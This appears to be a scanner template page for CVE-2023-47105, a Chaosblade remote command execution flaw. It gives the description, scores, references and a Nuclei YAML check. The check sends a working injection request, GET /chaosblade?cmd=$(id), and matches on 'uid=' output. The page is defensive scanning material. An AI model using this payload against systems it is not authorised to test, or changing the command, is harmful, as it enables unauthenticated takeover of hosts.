Chaosblade < 1.7.4 - Remote Code Execution
ID: CVE-2023-47105
Severity: high
Author: s4e-io
Tags: cve,cve2023,chaosblade,rce
Description
Section titled “Description”exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication.
YAML Source
Section titled “YAML Source”id: CVE-2023-47105
info: name: Chaosblade < 1.7.4 - Remote Code Execution author: s4e-io severity: high description: | exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication. impact: | This vulnerability allows unauthenticated attackers to remotely invoke the HTTP service and execute arbitrary commands on any Chaosblade instance with server mode enabled. This could lead to unauthorized access and control over the host system running Chaosblade. remediation: Fixed in 1.7.4 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-47105 - https://github.com/advisories/GHSA-723h-x37g-f8qm - https://github.com/chaosblade-io/chaosblade/blob/0a07380c9899febb2b544132783b376b44226cca/exec/os/executor.go#L68 - https://narrow-oatmeal-0c0.notion.site/ChaosBlade-Remote-Command-Execution-CVE-2023-47105-4f5459046488436caaec2bced6ff26d7 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L cvss-score: 8.6 cve-id: CVE-2023-47105 cwe-id: CWE-78 epss-score: 0.00043 epss-percentile: 0.10253 metadata: verified: true max-request: 1 vendor: chaosblade-io product: chaosblade tags: cve,cve2023,chaosblade,rce
http: - raw: - | GET /chaosblade?cmd=$(id) HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains_all(body,"uid=", "code", "success\":false", "error")' - 'status_code == 200' condition: and# digest: 490a0046304402207d0ffd96d56ed3bdaf0ea8cf87aff9997eb46c63e0bfe4152713473a196c5457022049536091fa75476f70373bd9e33f03b6ce91d5d18438eb2c59399c3f532fe154:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-47105.yaml"